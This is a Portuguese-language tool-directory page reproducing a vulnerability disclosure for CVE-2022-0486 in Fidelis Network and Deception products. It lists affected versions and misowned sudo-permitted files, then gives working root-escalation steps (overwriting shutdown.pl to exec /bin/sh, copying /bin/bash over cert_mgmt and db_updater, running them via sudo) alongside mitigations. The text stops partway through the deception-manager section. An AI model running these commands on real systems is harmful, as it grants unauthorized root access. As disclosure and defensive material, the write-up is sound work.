Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-0486 — Fidelis Network and Deception - Escalação de Privilégios por Permissões de Arquivo Inseguras - Múltiplas | Kitploit
Ferramentas/GitHubGitHub/henryreed/cve-2022-0486
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoRed TeamingExploração de Binários
GitHubhenryreed/cve-2022-0486

CVE-2022-0486

Fidelis Network and Deception - Escalação de Privilégios por Permissões de Arquivo Inseguras - Múltiplas

Ver Repositório
há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Fidelis Network and Deception - CVE-2022-0486 - Escalação de privilégios por permissões de arquivo inseguras - Múltiplos

Liberação e Agradecimentos

Todos os exploits foram aprovados para divulgação pública pelo Governo dos Estados Unidos. Agradecimentos especiais aos militares e representantes do governo encarregados de aprovar a documentação para distribuição ilimitada. Consulte os seguintes números de OTR:

  • OTR-2022-00482
  • OTR-2022-00483
  • OTR-2022-00484
  • OTR-2022-00485
  • OTR-2022-00486
  • OTR-2022-00488
  • OTR-2022-00489
  • OTR-2022-00490

Metadados

Data: 20220517 2005H UTC

Autor do Exploit: Henry Reed, The Aerospace Corporation

Página inicial do fornecedor: https://fidelissecurity.com/

Versões afetadas:

  • Fidelis CommandPost anterior a 9.4.5
  • Fidelis Collector anterior a 9.4.5
  • Fidelis Sensor anterior a 9.4.5
  • Fidelis Sandbox anterior a 9.4.5

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

CVE: CVE-2022-0486

Descrição do CVE: Permissões de arquivo incorretas nos componentes CommandPost, Collector, Sensor e Sandbox do Fidelis Network and Deception permitem que um atacante com acesso local e administrativo à CLI modifique arquivos afetados e possibilite a escalada de privilégios equivalentes ao usuário root. A vulnerabilidade está presente nas versões do Fidelis Network and Deception anteriores a 9.4.5. Patches e atualizações estão disponíveis para corrigir esta vulnerabilidade.

Resumo Executivo

Existem vários exploits sob este CVE, já que o CVE cobre uma série de permissões de arquivo incorretas. Todos os exploits se devem a uma permissão NOPASSWD e a várias permissões sudoers com exigência de senha concedidas ao usuário fidelis em binários ou scripts que pertencem ao usuário fidelis, permitindo assim que o usuário fidelis modifique arbitrariamente o arquivo. Isso permite a escalada local de privilégios.

Arquivo afetado com NOPASSWD:

  • /FSS/bin/shutdown.pl

Arquivos afetados que exigem senha:

  • /FSS/setup/cert_mgmt
  • /FSS/bin/db_updater
  • /FSS/deception-manager/bin/deception-manager
  • /FSS/sbin/fssdbg.sh
  • /FSS/bin/mst
  • /FSS/bin/setup
  • /FSS/setup/unlock_cp_user.sh

Recomenda-se que os usuários afetados do Fidelis Deception ou Fidelis Network atualizem seu software para corrigir esta vulnerabilidade. Também é recomendado a todos os usuários, independentemente de terem sido afetados por esta vulnerabilidade, desabilitar o acesso via shell aos seus produtos Fidelis após a configuração inicial.

Se, por algum motivo, qualquer uma dessas opções não for possível, uma mitigação para cada arquivo vulnerável está descrita neste documento. Até onde os testes do autor alcançaram, parece que os usuários precisarão usar uma dessas vulnerabilidades para escalar privilégios antes de poderem aplicar as mitigações descritas; portanto, atualizar o Fidelis e desabilitar o SSH é fortemente recomendado.

Escalação de privilégios via Shutdown.pl

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/bin/shutdown.pl permitem que o usuário fidelis escale privilégios equivalentes ao usuário root em vários produtos Fidelis. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/bin/shutdown.pl como usuário root sem solicitar senha. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o script e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo shutdown.pl:
$ chmod 700 /FSS/bin/shutdown.pl
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
$ echo '#!/usr/bin/perl -w' > /FSS/bin/shutdown.pl
$ echo "exec '/bin/sh';" >> /FSS/bin/shutdown.pl
$ cat /FSS/bin/shutdown.pl
#!/usr/bin/perl -w
exec '/bin/sh';
  1. Execute o arquivo usando o comando sudo
$ sudo /FSS/bin/shutdown.pl

Captura de tela mostrando a descoberta e exploração da vulnerabilidade. Observe a linha NOPASSWD, que indica que o shutdown.pl é um candidato em potencial para escalada de privilégios:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/bin/shutdown.pl para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/bin/shutdown.pl mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via cert_mgmt

Testado em:

  • Fidelis CommandPost 9.4.3
  • Fidelis Collector 9.4.3
  • Fidelis Sensor (VM Interna) 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/setup/cert_mgmt permitem que o usuário fidelis escale privilégios equivalentes ao usuário root em vários produtos Fidelis. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/setup/cert_mgmt como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o script e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo cert_mgmt:
$ chmod u+w /FSS/setup/cert_mgmt
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
$ cp /bin/bash /FSS/setup/cert_mgmt
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
$ sudo /FSS/setup/cert_mgmt

Captura de tela mostrando a descoberta e exploração da vulnerabilidade:

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/setup/cert_mgmt para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/setup/cert_mgmt mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via db_updater

Testado em:

  • Fidelis CommandPost 9.4.3

Resumo:

Permissões de propriedade mal configuradas em /FSS/bin/db_updater permitem que o usuário fidelis escale privilégios equivalentes ao usuário root no Fidelis CommandPost. Por padrão, a configuração do sudoers permite que o usuário fidelis execute /FSS/bin/db_updater como usuário root se uma senha for fornecida. O arquivo pertence ao usuário fidelis, permitindo que o usuário fidelis modifique arbitrariamente o binário e escale privilégios.

Exploração:

  1. Altere as permissões para permitir a modificação do arquivo db_updater:
$ chmod u+w /FSS/bin/db_updater
  1. Altere o arquivo conforme necessário para executar código arbitrário ou, neste exemplo, abrir um shell:
$ cp /bin/bash /FSS/bin/db_updater
  1. Execute o arquivo usando o comando sudo e autentique-se com a senha do usuário fidelis:
$ sudo /FSS/bin/db_updater

Mitigação:

Alterar o usuário e o grupo proprietários de /FSS/bin/db_updater para root:fidelis e permitir apenas permissões de leitura e execução ao grupo proprietário de /FSS/bin/db_updater mitigaria esta vulnerabilidade:

Escalação de privilégios autenticada via deception-manager

Testado em:

  • Fidelis CommandPost 9.4.3
Baixar ferramenta